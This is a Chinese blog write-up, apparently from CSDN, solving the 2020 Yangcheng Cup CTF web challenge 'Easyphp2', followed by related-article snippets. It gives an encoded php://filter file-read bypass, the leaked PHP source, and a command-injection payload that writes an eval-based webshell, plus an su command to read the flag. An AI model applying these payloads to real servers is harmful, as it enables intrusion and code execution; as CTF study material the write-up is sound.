[羊城杯 2020]Easyphp2

最新推荐文章于 2024-04-07 22:01:53 发布
最新推荐文章于 2024-04-07 22:01:53 发布
阅读量404 收藏 1
点赞数
分类专栏: Buuctf刷题篇 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/126476408
版权

在这里插入图片描述

看到 file 就想到伪协议看看

?file=php://filter/convert.base64-encode/resource=GWHT.php
# 被过滤
?file=php://filter/convert.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34-encode/resource=GWHT.php
# base64两次URL编码绕过
# PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoNCjxoZWFkPg0KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJpZT1lZGdlIj4NCiAgICA8dGl0bGU+Y291bnQgaXMgaGVyZTwvdGl0bGU+DQoNCiAgICA8c3R5bGU+DQoNCiAgICAgICAgaHRtbCwNCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBvdmVyZmxvdzogbm9uZTsNCiAgICAgICAgICAgIG1heC1oZWlnaHQ6IDEwMHZoOw0KICAgICAgICB9DQoNCiAgICA8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSBzdHlsZT0iaGVpZ2h0OiAxMDB2aDsgdGV4dC1hbGlnbjogY2VudGVyOyBiYWNrZ3JvdW5kLWNvbG9yOiBncmVlbjsgY29sb3I6IGJsdWU7IGRpc3BsYXk6IGZsZXg7IGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47IGp1c3RpZnktY29udGVudDogY2VudGVyOyI+DQoNCjxjZW50ZXI+PGltZyBzcmM9InF1ZXN0aW9uLmpwZyIgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIC8+IDwvY2VudGVyPg0KDQogICAgPD9waHANCiAgICBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCA1KTsNCg0KICAgIGlmICgkX0NPT0tJRVsncGFzcyddICE9PSBnZXRlbnYoJ1BBU1MnKSkgew0KICAgICAgICBzZXRjb29raWUoJ3Bhc3MnLCAnUEFTUycpOw0KICAgICAgICBkaWUoJzxoMj4nLic8aGFja2VyPicuJzxoMj4nLic8YnI+Jy4nPGgxPicuJzQwNCcuJzxoMT4nLic8YnI+Jy4nU29ycnksIG9ubHkgcGVvcGxlIGZyb20gR1dIVCBhcmUgYWxsb3dlZCB0byBhY2Nlc3MgdGhpcyB3ZWJzaXRlLicuJzIzMzMzJyk7DQogICAgfQ0KICAgID8+DQoNCiAgICA8aDE+QSBDb3VudGVyIGlzIGhlcmUsIGJ1dCBpdCBoYXMgc29tZXRpbmcgd3Jvbmc8L2gxPg0KDQogICAgPGZvcm0+DQogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIHZhbHVlPSJHV0hULnBocCIgbmFtZT0iZmlsZSI+DQogICAgICAgIDx0ZXh0YXJlYSBzdHlsZT0iYm9yZGVyLXJhZGl1czogMXJlbTsiIHR5cGU9InRleHQiIG5hbWU9ImNvdW50IiByb3dzPTEwIGNvbHM9NTA+PC90ZXh0YXJlYT48YnIgLz4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCI+DQogICAgPC9mb3JtPg0KDQogICAgPD9waHANCiAgICBpZiAoaXNzZXQoJF9HRVRbImNvdW50Il0pKSB7DQogICAgICAgICRjb3VudCA9ICRfR0VUWyJjb3VudCJdOw0KICAgICAgICBpZihwcmVnX21hdGNoKCcvO3xiYXNlNjR8cm90MTN8YmFzZTMyfGJhc2UxNnw8XD9waHB8Iy9pJywgJGNvdW50KSl7DQogICAgICAgIAlkaWUoJ2hhY2tlciEnKTsNCiAgICAgICAgfQ0KICAgICAgICBlY2hvICI8aDI+VGhlIENvdW50IGlzOiAiIC4gZXhlYygncHJpbnRmIFwnJyAuICRjb3VudCAuICdcJyB8IHdjIC1jJykgLiAiPC9oMj4iOw0KICAgIH0NCiAgICA/Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=

    <?php
    ini_set('max_execution_time', 5);

    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>
    
    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
        	die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>

第一段是要求 cookie 等于环境变量里的 PASS,但是不知道

第二段 exec('printf \'' . $count . '\' | wc -c') 可以执行命令

robots.txt 下发现 Disallow: /?file=check.php

同样的方法查看代码

<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";

header('Location: /');

得到 cookie 是 GWHT

在这里插入图片描述

下面就是构造写马

payload

count=abc'|echo "<?= eval(\$_POST['cmd'])?>" > a.php|'abc

在这里插入图片描述

0440 没权限查看文件,但是查看环境变量可以发现 flag

在这里插入图片描述

算是非预期吧,预期应该是同目录下 README 里记录的密码提升权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

payload

printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'
paidx0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Easy2PHP v1.0.0(apache2+mysql6+php5)
11-02
程序采用目前最新版本的AMP+Z(即Apache,MySQL,PHP,Zend)# 版本如果您的计算机已经安装了IIS或者MySQL,请先停止掉IIS和MySQL的服务再运行。1, 运行'All_Start.cmd'文件,在浏览器内访问站点http8080/ 。2, 如不需要MySQL服务,则运行'Apache_Start.cmd'即可。3,'All_Stop.cmd'文件为停止所有服务,包括Apache,MySQL。4,虚拟主机的主目录为'website',只要将您的网站程序放到该目录下,默认的站点地址为http8080/,如要访问website目录下的test.php,则在浏览器中输入http8080/test.php即可访问。
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
[羊城杯 2020]Easyphp2 ---不会编程的崽
最新发布
不会编程的崽的博客
04-07 436
伪协议url编码绕过,命令写入一句话木马
BUUCTF--[羊城杯 2020]Easyphp2
qq_46263951的博客
08-18 1264
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
羊城杯2020 Easyphp2
qq_53755216的博客
06-24 1097
随便刷一刷 随便总结一下 随便涨点姿势 二话不说先目录扫描 但是扫出来一堆429.。。。 看了一下dirsearch的readme 发现了以下参数 -s DELAY, --delay=DELAY Delay between requests emmm 真不错 重新来! 还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
BUUCTF[web][p6][[羊城杯 2020]Easyphp2]
qq_29060627的博客
05-06 1077
第1步,开局: http://url/?file=GWHT.php 第2步:使用dirsearch-master扫描网站:得robots.txt 内容为: Disallow: /?file=check.php 看样子是文件包含: 第3步,编码访问得源码[ GWHT.php check.php index.php ] ,index.php无法继续包含: http://url/?file=php://filter/convert.%25%36%32ase64-encode/resourc
EasyPHP5-2-17
07-22
资源名称:EasyPHP5-2-17工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
EasyPHP5-2-17.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
easy2php环境工具
03-03
快速部署PHP环境,便于开发和调试。批量处理,十分方便
Easy2PHP5 build 2 php本地电脑环境
03-08
什么是Easy2PHP? Easy2PHP是Windows下的Apache + PHP + MySQL + Zend + phpMyAdmin 的绿色环境套件,免安装,几秒钟即可搭建Web服务器。 *************************************** 如何使用Easy2PHP? 1,先点击下载Easy2PHP解压包,解压到任意目录(不要含中文路径)。 2,运行目录内的Exec2PHP.exe执行文件,在电脑桌面右下方(系统托盘)处可看到该程序图标。 3, 鼠标左键单击该程序图标,将会出现菜单选项。 - 启动Apache,仅启动Apache服务,重启,停止略,启动MySQL,仅启动MySQL服务。 - 全部启动则启动Apahce跟MySQL两个服务,全部停止略。 - 访问phpMyAdmin,是访问website目录内的phpMyAdmin程序。 - 访问首页是访问website目录内的index.php文件 - 打开服务,是为了方便查看Apache跟MySQL服务是否启动。 - 退出,仅退出Exec2PHP程序。 注意:MySQL的端口是默认的配置(3306),如果你的电脑之前已经安装了MySQL,并已经启动了该服务, 请先将该MySQL服务停止后再运行Easy2PHP,确保程序使用的稳定。 4,虚拟主机的主目录为'website',只要将您的网站程序放到该目录下, 默认的站点地址为http://localhost:8080/,如要访问website目录下的test.php, 则在浏览器中输入http://localhost:8080/test.php即可访问。 5, 登录phpMyAdmin的帐号root,密码123456。 ***************************************
Easy2PHP5 Build 2 (apache2+mysql5+php5)
11-02
Easy2PHP是Windows下的Apache + PHP + MySQL + Zend + phpMyAdmin 的绿色环境套件,免安装,几秒钟即可搭建Web服务器。 当前版本包含: Apache 2.2.6 PHP 5.2.6 MySQL 5.0.45 Zend Optimizer 3.3.0 phpMyAdmin 2.11.2
[羊城杯 2020]Easyphp2 WP
wmicn的博客
09-15 1890
[羊城杯 2020]Easyphp2 进入题目,观察到两个点 1.是url中get的file参数 2.是题目要求 only people from GWHT are allowed to access this website 考虑先使用php伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php 测试发现是base64被过滤了,但是quoted-printable-encode并没有被过滤 ?file=php://filt
[羊城杯2020]easyphp
nigo134的博客
06-15 536
1. .htaccess的利用.htaccess利用方式 .htaccess相关问题2.php://filter的利用关于php://filter在file_put_contents中的利用_bfengj的博客-CSDN博客 核心代码: filename只能由点和字母组成,content不能有flag和file。乍一看挺简单的filename传a.php,content传再用蚁剑访问就行了。但事实是想多了,确实能够将木马写入a.php,也可以访问a.php,但......
[羊城杯 2020]Easyphp2&&[羊城杯 2020]Blackcat
2202_75361164的博客
12-04 142
[羊城杯 2020]Easyphp2&&[羊城杯 2020]Blackcat
[羊城杯 2020]easyphp
LYJ20010728的博客
05-17 1157
[羊城杯 2020]easyphpeasyphp考点思路Payload easyphp 考点 .htaccess的利用 思路 在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码; 思路一:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n; 思路二:利用.htaccess文件特性,不过这次是
攻防世界 easyphp
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值